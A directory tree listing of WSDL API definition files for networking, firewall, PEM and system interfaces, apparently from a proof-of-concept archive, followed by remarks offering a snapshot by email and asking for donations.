├── [ 37K] Networking.iSessionLocalInterface.wsdl
├── [ 32K] Networking.iSessionPeerDiscovery.wsdl
├── [ 55K] Networking.iSessionRemoteInterfaceV2.wsdl
├── [ 40K] Networking.iSessionRemoteInterface.wsdl
├── [ 19K] Networking.LLDPGlobals.wsdl
├── [9.5K] Networking.MulticastRoute.wsdl
├── [ 33K] Networking.PacketFilterGlobals.wsdl
├── [409K] Networking.PacketFilter.wsdl
├── [ 12K] Networking.PortMirror.wsdl
├── [ 46K] Networking.ProfileFEC.wsdl
├── [ 23K] Networking.ProfileGeneve.wsdl
├── [ 30K] Networking.ProfileGRE.wsdl
├── [ 23K] Networking.ProfileIPIP.wsdl
├── [ 19K] Networking.ProfileIPsec.wsdl
├── [ 25K] Networking.ProfileLightweight4Over6Tunnel.wsdl
├── [ 28K] Networking.ProfileMAP.wsdl
├── [ 28K] Networking.ProfileV6RD.wsdl
├── [ 27K] Networking.ProfileVXLAN.wsdl
├── [ 29K] Networking.ProfileWCCPGRE.wsdl
├── [649K] Networking.RouteDomainV2.wsdl
├── [ 21K] Networking.RouteDomain.wsdl
├── [ 38K] Networking.RouterAdvertisement.wsdl
├── [ 52K] Networking.RouteTableV2.wsdl
├── [ 41K] Networking.RouteTable.wsdl
├── [ 56K] Networking.SelfIPPortLockdown.wsdl
├── [638K] Networking.SelfIPV2.wsdl
├── [ 18K] Networking.SelfIP.wsdl
├── [ 44K] Networking.SFCChain.wsdl
├── [ 23K] Networking.SFCHop.wsdl
├── [ 29K] Networking.SFCSf.wsdl
├── [ 28K] Networking.STPGlobals.wsdl
├── [ 47K] Networking.STPInstanceV2.wsdl
├── [ 45K] Networking.STPInstance.wsdl
├── [424K] Networking.Trunk.wsdl
├── [ 65K] Networking.Tunnel.wsdl
├── [ 49K] Networking.VLANGroup.wsdl
├── [ 83K] Networking.VLAN.wsdl
├── [ 18K] PEM.FormatScript.wsdl
├── [ 33K] PEM.ForwardingEndpoint.wsdl
├── [ 14K] PEM.InterceptionEndpoint.wsdl
├── [ 15K] PEM.Listener.wsdl
├── [164K] PEM.Policy.wsdl
├── [ 34K] PEM.ServiceChainEndpoint.wsdl
├── [402K] PEM.Subscriber.wsdl
├── [445K] Security.DoSDevice.wsdl
├── [ 30K] Security.DoSWhitelist.wsdl
├── [ 52K] Security.FirewallAddressList.wsdl
├── [556K] Security.FirewallGlobalAdminIPRuleList.wsdl
├── [611K] Security.FirewallGlobalRuleList.wsdl
├── [588K] Security.FirewallPolicy.wsdl
├── [ 28K] Security.FirewallPortList.wsdl
├── [205K] Security.FirewallRuleList.wsdl
├── [ 29K] Security.FirewallWeeklySchedule.wsdl
├── [ 21K] Security.IPIntelligenceBlacklistCategory.wsdl
├── [ 38K] Security.IPIntelligenceFeedList.wsdl
├── [ 10K] Security.IPIntelligenceGlobalPolicy.wsdl
├── [ 53K] Security.IPIntelligencePolicy.wsdl
├── [293K] Security.LogProfile.wsdl
├── [415K] Security.ProfileDNSSecurity.wsdl
├── [637K] Security.ProfileDoS.wsdl
├── [427K] Security.ProfileIPIntelligence.wsdl
├── [424K] System.CABundleManager.wsdl
├── [ 30K] System.CertificateRevocationListFile.wsdl
├── [ 31K] System.Cluster.wsdl
├── [ 54K] System.ConfigSync.wsdl
├── [ 58K] System.Connections.wsdl
├── [411K] System.CryptoClient.wsdl
├── [404K] System.CryptoServer.wsdl
├── [ 48K] System.Disk.wsdl
├── [ 28K] System.ExternalMonitorFile.wsdl
├── [ 17K] System.Failover.wsdl
├── [5.7K] System.GeoIP.wsdl
├── [ 83K] System.HAGroup.wsdl
├── [ 24K] System.HAStatus.wsdl
├── [ 13K] System.Inet.wsdl
├── [8.7K] System.Internal.wsdl
├── [ 22K] System.LightweightTunnelTableFile.wsdl
├── [ 25K] System.PerformanceSFlow.wsdl
├── [ 34K] System.Services.wsdl
├── [ 45K] System.Session.wsdl
├── [ 46K] System.SoftwareManagement.wsdl
├── [533K] System.Statistics.wsdl
├── [434K] System.SystemInfo.wsdl
├── [477K] System.VCMP.wsdl
├── [452K] WebAccelerator.Applications.wsdl
├── [ 21K] WebAccelerator.Policies.wsdl
└── [5.7K] WebAccelerator.ProxyMessage.wsdl
4 directories, 294 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.